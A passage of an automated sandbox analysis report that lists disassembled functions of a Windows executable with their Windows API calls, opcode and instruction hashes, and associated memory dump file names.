                                                                                                                                                                                                                          • Instruction ID: 5a87949bd8644cc2502843e5dbdbcb3c7a21feffc6e18bcd60126fbccab35f8a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd93b2f2aa8406ec89fa7aa30f214d2d9854d004cc7e69a6fb877e17aee12e94
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF21EF746607629FE731CF69EC047427BE4BB0A324F10875DE95A9BBD0EBB490848B80
                                                                                                                                                                                                                          Function 010DA9A0 Relevance: 4.5, APIs: 3, Instructions: 47COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 01085D50: SetEvent.KERNEL32(03BFE848,?,7CAB6A82), ref: 0108600C
                                                                                                                                                                                                                          • SetEvent.KERNEL32(03C16160,00000001), ref: 010DAA1C
                                                                                                                                                                                                                          • SetEvent.KERNEL32(03C161E0,00000001), ref: 010DAA37
                                                                                                                                                                                                                          • SleepEx.KERNEL32(000000FF,00000000), ref: 010DAA5A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Event$Sleep
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1754279505-0
                                                                                                                                                                                                                          • Opcode ID: 1f8c549a89a14b0d41e65fb5b7ffee66ead1831da4f3da6879588702796f1690
                                                                                                                                                                                                                          • Instruction ID: b5549057aa9c3e4a1a693a941f250d4788d6910e40ca9b7112497243c170a787
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f8c549a89a14b0d41e65fb5b7ffee66ead1831da4f3da6879588702796f1690
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A118F31A00204DFDB64EFA8DD887897BF0EB05304F50A1A9D9858B2A5CB319896CF17
                                                                                                                                                                                                                          Function 00FC5BC0 Relevance: 3.9, APIs: 3, Instructions: 158COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,7CAB6A82,00000000,7CAB6A82,?,?,00000001,7CAB6A82,?), ref: 00FC5C5B
                                                                                                                                                                                                                            • Part of subcall function 00FFE830: EnterCriticalSection.KERNEL32(00000000,?,00000000,03C176F0,00000000,?,010E27AE,?,01229EF5), ref: 00FFE8B9
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,7CAB6A82,00000000,7CAB6A82,?,?,00000001,7CAB6A82,?), ref: 00FC5C8E
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,00000000,7CAB6A82,?,7CAB6A82,00000000,7CAB6A82,?,?,00000001,7CAB6A82,?), ref: 00FC5CDC
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2978645861-0
                                                                                                                                                                                                                          • Opcode ID: 927d74193ac6ba4ac6820a255278b0f019ab46e3de8496f84d1a0eed5dabb499
                                                                                                                                                                                                                          • Instruction ID: 6178bea25d4feb49b6fd47a16b136a3eeb0e39e5c95d2fdb549047bd1d284d17
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 927d74193ac6ba4ac6820a255278b0f019ab46e3de8496f84d1a0eed5dabb499
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D51EF71A05B0A9BCB21CF69C946F9AFBB4FF54B20F10425EE85563391D734AD40EB90
                                                                                                                                                                                                                          Function 0122E910 Relevance: 3.9, APIs: 3, Instructions: 131memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(03C71B78,?,00000000,7CAB6A82,00000000,00000129,00000000,01084E25,7CAB6A82,00000000), ref: 0122E98C
                                                                                                                                                                                                                            • Part of subcall function 014A8C50: GetSystemInfo.KERNEL32(?,00000000,03C71B78,03C05978), ref: 014A8C85
                                                                                                                                                                                                                            • Part of subcall function 014A8C50: GetSystemInfo.KERNEL32(?,00000000,03C71B78,03C05978), ref: 014A8CA6
                                                                                                                                                                                                                            • Part of subcall function 014A8C50: GetSystemInfo.KERNEL32(?,00000000,03C71B78,03C05978), ref: 014A8CCB
                                                                                                                                                                                                                            • Part of subcall function 014A8C50: GetSystemInfo.KERNEL32(?,00000000,03C71B78,03C05978), ref: 014A8CF3
                                                                                                                                                                                                                            • Part of subcall function 014A8C50: GetSystemInfo.KERNEL32(?,00000000,03C71B78,03C05978), ref: 014A8D19
                                                                                                                                                                                                                            • Part of subcall function 014A8C50: GetSystemInfo.KERNEL32(?,00000000,03C71B78,03C05978), ref: 014A8D39
                                                                                                                                                                                                                            • Part of subcall function 014A8C50: MapViewOfFile.KERNEL32(00000129,00000026,00000000,00000000,00000129,00000000,03C71B78,03C05978), ref: 014A8D57
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(03C71B78,7CAB6A82,00000000,?,00000000,00000000,?,00000000,7CAB6A82,00000000,00000129,00000000,01084E25,7CAB6A82,00000000), ref: 0122EA23
                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,7CAB6A82,00000000,00000129,00000000,01084E25,7CAB6A82,00000000,?,00000000,?,00000000), ref: 0122EA87
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InfoSystem$CriticalLeaveSection$AllocFileViewVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1604825630-0
                                                                                                                                                                                                                          • Opcode ID: 9c3d5ccd022c9982635804b8c6f91aa64f57c1073722e25381178ed8b37e3683
                                                                                                                                                                                                                          • Instruction ID: eb8f2db7730a5a859e68a1c110b3a0e437f3b035e17a5368e6ce6e4fa6946dbc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c3d5ccd022c9982635804b8c6f91aa64f57c1073722e25381178ed8b37e3683
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D341D075A10716EFEB25CF59D845BAEFBB0FB49720F01422AEA14A73A1C7315801DB90
                                                                                                                                                                                                                          Function 01084430 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • ResumeThread.KERNEL32(?,00000000,00000000,?,012CC863,00000001,00000000,012CC720,00000000,00000000), ref: 0108443A
                                                                                                                                                                                                                            • Part of subcall function 010E27C0: GetLastError.KERNEL32(7CAB6A82,?,00000000), ref: 010E27F2
                                                                                                                                                                                                                            • Part of subcall function 010E27C0: _swprintf.LIBCMT ref: 010E2829
                                                                                                                                                                                                                            • Part of subcall function 010E27C0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 010E2869
                                                                                                                                                                                                                            • Part of subcall function 010E27C0: MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,000000FF,00000000,00000000), ref: 010E28A4
                                                                                                                                                                                                                            • Part of subcall function 010E27C0: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 010E28EA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorFreeHeapLastResumeThread_swprintf
                                                                                                                                                                                                                          • String ID: ResumeThread
                                                                                                                                                                                                                          • API String ID: 1738802777-947044025
                                                                                                                                                                                                                          • Opcode ID: bd484f0b34aa8cff013dc93b856859598a76a870da684eb868949f9b6d6cedef
                                                                                                                                                                                                                          • Instruction ID: 4ceb571918ae44fa24a059e9cc4eaabc08604fd688c2c954722ce0461f06fe5a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd484f0b34aa8cff013dc93b856859598a76a870da684eb868949f9b6d6cedef
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BDD0A7367000201B8110256E58094EAD29DDBD55723250279E6F1DB2D0CF600C4243F0
                                                                                                                                                                                                                          Function 012C2FD0 Relevance: 3.5, APIs: 1, Instructions: 2232memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,015A58D0,00000000), ref: 012C3068
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: caa6aaa3d03f17137e29def87b6b1c5d98d5425f5a7cd06ea63ff9258a0e04a8
                                                                                                                                                                                                                          • Instruction ID: 1516b469219192d7c5b5c9a12cc259719e9ed1998c1dd1c0473edd31fa882be6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: caa6aaa3d03f17137e29def87b6b1c5d98d5425f5a7cd06ea63ff9258a0e04a8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CDF2A0787C0701BBFB39AA619C93F963212AB94F14F31A415B7453E6C8CAF578908B4D
                                                                                                                                                                                                                          Function 01087040 Relevance: 3.3, APIs: 2, Instructions: 330COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 740191df61003f77f2fad429630009189bafb41c9a037ed86e1c5aa6a5927350
                                                                                                                                                                                                                          • Instruction ID: 7467d4446a16c4ab7d8c222841c099645e4e2d941885d387007598452e30e309
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 740191df61003f77f2fad429630009189bafb41c9a037ed86e1c5aa6a5927350
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1E19E30A04205CFDB65EF6CD884BADBBF1FF04314F2441A9E991AB399CB75A941CB91
                                                                                                                                                                                                                          Function 0104C460 Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 314stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,.ctor,?,?,?,?,?,7CAB6A82,05C7D62C,0CB3F4BC,?), ref: 0104C639
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: strcmp
                                                                                                                                                                                                                          • String ID: .ctor
                                                                                                                                                                                                                          • API String ID: 1004003707-2664864097
                                                                                                                                                                                                                          • Opcode ID: e24aee7fb6f511a6c9fbce8e1e7564b7e585280b90cc8efb3533dfd117ed9b5a
                                                                                                                                                                                                                          • Instruction ID: da0c78ca190505be6124c1868883dc308aa4ab7966c6c907c2766fbcf802f22a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e24aee7fb6f511a6c9fbce8e1e7564b7e585280b90cc8efb3533dfd117ed9b5a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FB1D1B1A0160A9BFB11DF68CAC0BAEBBA5FF44754F044179EE50A7291E735EC11CB90
                                                                                                                                                                                                                          Function 01085D50 Relevance: 3.2, APIs: 2, Instructions: 178threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0108A980: VirtualQuery.KERNEL32(?,?,0000001C,?,?,01085DB5,?,7CAB6A82), ref: 0108A99F
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 01085EDF
                                                                                                                                                                                                                          • SetEvent.KERNEL32(03BFE848,?,7CAB6A82), ref: 0108600C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentEventQueryThreadVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2478193043-0
                                                                                                                                                                                                                          • Opcode ID: 09c5f3fcec819108f0225c46ad4bf0eca4d56b39ff148d400d6ab21b37cd7cc4
                                                                                                                                                                                                                          • Instruction ID: bd8b549fa10f569f936d7d8cc840b160bfef9278a2fdb763978503cbe5035b17
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09c5f3fcec819108f0225c46ad4bf0eca4d56b39ff148d400d6ab21b37cd7cc4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59716A70A04249CFEB14EFA8C9887ADBBF4FB05314F1045ADD8859B392DB7A9944CB90
                                                                                                                                                                                                                          Function 0141ABC0 Relevance: 3.1, APIs: 2, Instructions: 119COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 01223C50: HeapFree.KERNEL32(00000000,?,?,?), ref: 01223D68
                                                                                                                                                                                                                            • Part of subcall function 01097970: SetThreadErrorMode.KERNEL32(00008001,?,7CAB6A82,?,00000000), ref: 010979A9
                                                                                                                                                                                                                            • Part of subcall function 01097970: GetLastError.KERNEL32(?,?,00000000), ref: 010979C5
                                                                                                                                                                                                                            • Part of subcall function 01097970: SetThreadErrorMode.KERNEL32(?,00000000,?,00000000), ref: 010979DF
                                                                                                                                                                                                                            • Part of subcall function 01097970: SetLastError.KERNEL32(00000000,?,00000000), ref: 010979E6
                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000008,?,?,?,?,?,?,7CAB6A82,?,?), ref: 0141AC57
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,7CAB6A82,?,?,00000000,014F65ED,000000FF,?,00000008,?,?,?,?,?,?,7CAB6A82), ref: 0141AD0E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Error$Last$FreeModeThread$HeapLibrary
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3385596422-0
                                                                                                                                                                                                                          • Opcode ID: dea45124f5b2b33ed674b8abb26ad5e30d9d028b62e2eb7fbf2f2cfbb10ecb71
                                                                                                                                                                                                                          • Instruction ID: 84c29440310e886b63a7bcc634f016d174326c37f8a996dbbfb9092825e32d6c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dea45124f5b2b33ed674b8abb26ad5e30d9d028b62e2eb7fbf2f2cfbb10ecb71
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6141BCB0601B06AFD714CF19C814B5AFBF4FB04724F10865EE8189BB90E779A914CBC0
                                                                                                                                                                                                                          Function 01086EC0 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CoGetContextToken.OLE32(?,7CAB6A82,?,?), ref: 01086F23
                                                                                                                                                                                                                          • CoUninitialize.COMBASE(7CAB6A82), ref: 01086FA7
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
